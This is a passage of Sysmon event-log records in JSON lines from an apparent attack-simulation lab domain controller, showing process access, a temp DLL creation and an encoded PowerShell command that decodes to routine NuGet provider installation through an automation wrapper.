{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010A4770600}\r\nTargetProcessId: 4672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010A4770600}","TargetProcessId":"4672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010A4770600}\r\nTargetProcessId: 4672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010A4770600}","TargetProcessId":"4672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:15.123\r\nProcessGuid: {A837DB8D-030E-5F25-0000-00102C740600}\r\nProcessId: 2392\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\r1wdh35o.dll\r\nCreationUtcTime: 2020-08-01 05:52:14.826","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:15.123","ProcessGuid":"{A837DB8D-030E-5F25-0000-00102C740600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\r1wdh35o.dll","CreationUtcTime":"2020-08-01 05:52:14.826","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.385\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nProcessId: 3112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nParentProcessId: 2968\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.385","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010637A0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","ParentProcessId":"2968","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nSourceProcessId: 2968\r\nSourceThreadId: 1364\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","SourceProcessId":"2968","SourceThreadId":"1364","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nTargetProcessId: 3112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","TargetProcessId":"3112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 